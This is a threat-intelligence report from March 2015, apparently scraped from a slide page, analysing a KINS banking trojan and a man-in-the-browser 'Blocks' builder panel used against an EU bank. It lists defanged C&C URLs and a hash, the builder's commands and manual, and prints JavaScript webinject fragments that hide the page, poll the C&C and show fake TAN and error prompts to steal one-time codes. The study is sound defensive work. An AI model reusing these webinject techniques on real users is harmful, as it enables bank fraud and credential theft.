INTRODUCTION
In the past we managed to analyse all well knows malwares and theirs C&C servers. We saw a “Kins” malware with unique “ATS” engine acting like real electronic web banking application in auto pilot mode (1). We all know how easy is to go underground and to buy a malware kits with MitB (2) add-ons for well-known electronic banking web applications and also to order a custom one. These injectors are main weapon used from bad guys for the electronic banking application where 2-factor authentication “Tokens” is implemented.
Boost Fertility New Invention Ups Success Rates.pdf
Revealing Unique MitB Builder C&C Server
1. Revealing Unique MitB Builder C&C Server 1
Revealing Unique MitB Builder
C&C Server
Short Technical Analyses for Intel and Awareness
Senad Aruc & Davide Cioccia
March 2015
2. (1) https://www.linkedin.com/pulse/20141117183957-26232854-kins-origin-malware-with-
unique-atsengine-cc-server?trk=prof-post
(2) http://en.wikipedia.org/wiki/Man-in-the-browser
INTRODUCTION
In the past we managed to analyse all well knows malwares and theirs C&C servers. We
saw a “Kins” malware with unique “ATS” engine acting like real electronic web banking
application in auto pilot mode (1). We all know how easy is to go underground and to
buy a malware kits with MitB (2) add-ons for well-known electronic banking web
applications and also to order a custom one. These injectors are main weapon used from
bad guys for the electronic banking application where 2-factor authentication “Tokens” is
implemented.
Man in the Browser Attack (2)
3. (1) https://www.linkedin.com/pulse/20141117183957-26232854-kins-origin-malware-with-
unique-atsengine-cc-server?trk=prof-post
(2) http://en.wikipedia.org/wiki/Man-in-the-browser
Bypassing the 2 factor authentication (3)
ATTACK
We got an exclusive right to analyse this malware sample who is targeting a large
finance institution located in EU. The attack is targeted attack with three main
components.
• Malware “KINS”
o Version: 2.0
o First seen: 14.02.2015
o MD5: babc53295da4cd953a1cae1e33de4910
• C&C “Zeus”
o Configuration: hxxx://hidden.ru:80/1/uggi/binari/hy78.jpg à Config
o Drop-Zone: hxxx://hidden.ru:80/1/uggi/gate.php à Gate
o Binary: hxxx://hidden.ru:80/1/uggi/binari/bot.exe à Malware
• MitB C&C “Blocks”
o Base64 encoded: aHR0cHM6Ly9hiddencnkuY29tLhiddenaHA=
o Base64 decoded: hxxs://hidden.com:443/s/g.php à Gate
o hxxx://hidden.com:443/s/manual.php à Russian Manual for Blocks
o hxxx://hidden.com:443/s/center.php à C&C Server for Blocks MitB
4. (1) https://www.linkedin.com/pulse/20141117183957-26232854-kins-origin-malware-with-
unique-atsengine-cc-server?trk=prof-post
(2) http://en.wikipedia.org/wiki/Man-in-the-browser
INSIDE MITB C&C BLOCKS
This unique MitB builder is design to help even an unexperienced Hacker to build a MitB
attacks just by adding and configuring blocks for every single function and step.
Using this method the hacker can interact with the victim’s action in hidden way pushing
injected commands inside the browser and hiding them by manipulating CSS, HTML and
JavaScript.
C&C Blocks MitB Server Login Page
6. (1) https://www.linkedin.com/pulse/20141117183957-26232854-kins-origin-malware-with-
unique-atsengine-cc-server?trk=prof-post
(2) http://en.wikipedia.org/wiki/Man-in-the-browser
The edit function located into first section is for building a MitB for the victims of that
specific bank-group. Here we can see the blocks for building the perfect MitB attack.
MitB Group Builder
The command list for every block is described in this dropdown list.
• Go – Is allowing the victim to reach the e-banking web application
• Question – Building a custom questionaries’ for the victims
• Error Question – Asking a questing with error output
• Tan – Java-Script function
• Error Tan - Java-Script function
• Hold – This is the function when victim click the button for transaction.
• Error Login – To trick victim that the login details are not correct.
• Kick – to kick the victim from e-banking application
• Confirm – Building a fake confirm messages
• Page – To forward the victim on different page.
7. (1) https://www.linkedin.com/pulse/20141117183957-26232854-kins-origin-malware-with-
unique-atsengine-cc-server?trk=prof-post
(2) http://en.wikipedia.org/wiki/Man-in-the-browser
Drop-Down List Commands
Another function of this MitB builder is custom injections for every single victim-bot.
Here we can see the inject functions that attacker can build for a specific victim-bot. The
username and the OTP password for every single command can be seen from the info
marked in red box.
The attackers can configure the following inject functions.
• Button Text
• Command
• Parameter 1
• Parameter 3
• Style
9. (1) https://www.linkedin.com/pulse/20141117183957-26232854-kins-origin-malware-with-
unique-atsengine-cc-server?trk=prof-post
(2) http://en.wikipedia.org/wiki/Man-in-the-browser
The only manual that we managed to discover is a short description about this MitB.
English Translation:
Manual for this MitB builder
Leadership
1.Statistic:
Each bank prisvaevaetsya initial value of whether to skip authentication at the entrance
hold - delay on user param1 seconds, Param2 param3 not uchityvayutsya
- If the operator of the admin is not online then the user will be skipped.
go - to pass user parameters are not uchityvayutsya
2.Last results:
For multi-query
info_send_1 - Zapraschivaemaya information was sent
info_send_2 - Information of the second page has been sent
For single-query
info_send - infa sent
10. (1) https://www.linkedin.com/pulse/20141117183957-26232854-kins-origin-malware-with-
unique-atsengine-cc-server?trk=prof-post
(2) http://en.wikipedia.org/wiki/Man-in-the-browser
INJECTIONS
During our analysis, we detect the configuration file used by KINS malware to steal
sensible information from end users. The injected script present a default configuration
of financial malware, using a webinject entry with different fields:
• Entry: Type of injection performed by the malware
• Target: The real target. An online banking portal.
• Flags: HTTP methods that malware need to intercept to change the HTML code
inside the HTTP response. We found two flags inside the configuration file :
o P - used to intercept an HTTP POST request
o G - used to intercept an HTTP GET request
• data_before_inject: the right point where the webinject is installed
• data_end: the last point after the injection.
• data_inject: the real JavaScript injection
As we can see through the configuration file, the first operation made by the malware is
to hide the total content of the HTML body, with the following operation:
1. jQuery('body').hide();
After that, the user is blocked for a short period, until the malware receive instructions
from the C&C server. Here, in this snippet code, we can see the command shared
between client and server:
1. function checkReturnCommand()
2. {
3. var req = "send=2&u_bot_id=" +bot_id+"&bn=euHypo&u_login=&u_pass
=&log=cbf_check_command";
4. function check_command()
5. {
6. if ( do2[0] =='go')
7. {
8. logMessages( 'let user go' , 'go', '','' );
9. }
10. else if( do2[0] =='errorlogin')
11. {
12. logMessages( 'Show Error Login or Tan Message to Holder'
, do2[0] , do2[1],do2[2] );
13. clearInterval(checkInterval);
14. }
15. else if( do2[0] == 'question')
16. {
17. logMessages( 'Show Question['+do2[1]+']' , do2[0] , do2[1
],do2[2] );
18. clearInterval(checkInterval);
19. }
20. }
11. (1) https://www.linkedin.com/pulse/20141117183957-26232854-kins-origin-malware-with-
unique-atsengine-cc-server?trk=prof-post
(2) http://en.wikipedia.org/wiki/Man-in-the-browser
21. sendScriptRequest(sa, req,check_command, ["test123"]);
22. }
This function is a call back from the server to check the user status. If the C&C answer
with a go command, the malware stop the execution and the user can navigate the
website, going to the next webpage. The 'errorlogin' command can show an error or a
TAN request on the user browser to steal the dynamic part of credentials. The 'question'
command can ask the secret question and answer panel, to steal the information to
recovery a lost password.
Another function has different command to perform different actions
1. function statusCall()
2. {
3. if( ret_val == '0')
4. {
5. if (( do2[0] == 'go') || ( do2[0] == 'go_inactive'))
6. {
7. logMessages( 'let user go' , 'go', '','' );
8. }
9. else if( ( do2[0] == 'hold' ) || ( do2[0] == 'tan' ) )
10. {
11. logMessages('Hold after login,show first throbber for '+sT
imer+' Sec','throb','','');
12. return false;
13. }
14. }
15. else if( ret_val =='block')
16. {
17. logMessages('Show block fake','block','','');
18. return false;
19. }
20. }
21. sendScriptRequest(sa, req,statusCall, ["test123"]);
Here we have, 'hold', 'tan' and 'block' commands to hold informations, show the TAN
authentication panel and block the user with a fake message.
CONCLUSION
A normal antivirus cannot detect this kind of advanced malware. Once the
malware infect a machine, it can change his behaviour and code continuously to
avoid a signature-based detection. This new MitB builder, also, is changing the
way that the MitB injector is built and sold in black markets. Using this builder
every normal user can build an own inject for MitB and target different banks
with no time. A new injection, or a complete malware can be bought from
12. (1) https://www.linkedin.com/pulse/20141117183957-26232854-kins-origin-malware-with-
unique-atsengine-cc-server?trk=prof-post
(2) http://en.wikipedia.org/wiki/Man-in-the-browser
forums and markets in the dark web for few Bitcoins or hundred dollars. A
complete solution provide the C&C panel (dropzone), the malware, the injection,
a spam campaign and, if needed, a malicious mobile application to steal
sensitive data like OTP.
To protect end users from that risk, financial institutes have to choose different
solutions that can detect different behaviour in the webpage and in the user
experience. The possibility to make a custom web injects for every single action
is making this attack different for each bank. Signature based detection, can be
avoided obfuscating the code with different techniques and methodologies, but
there are different solutions to raise an alert when the integrity of the webpage
is compromised. Solutions named Active Fraud Prevention can analyse
dynamically the HTML resources and fingerprint users to avoid different
connections in a short time from different country (“Session Stealing”).
ABOUT
Senad Aruch
Multiple Certified ISMS Professional with
10-year background in: IT Security, IDS
and IPS, SIEM, SOC, Network Forensics,
Malware Analyses, ISMS and RISK, Ethical
Hacking, Vulnerability Management, Anti
Fraud and Cyber Security. Currently
holding a Senior Lead position.
E-Mail: senad.aruc@gmail.com
Blog: www.senadaruc.com
Twitter: senadaruch
linkedin.com/in/senadaruc
Davide Cioccia
MSc Computer Engineering Degree.
Security Developer focused on
Cyber Security Intelligence,
Malware analysis, Anti-fraud
systems. Microsoft certified.
Currently holding a Security
Consultant position.
E-Mail: davide.cioccia@live.it
Twitter: david107
LinkedIn:linkedin.com/in/david
ecioccia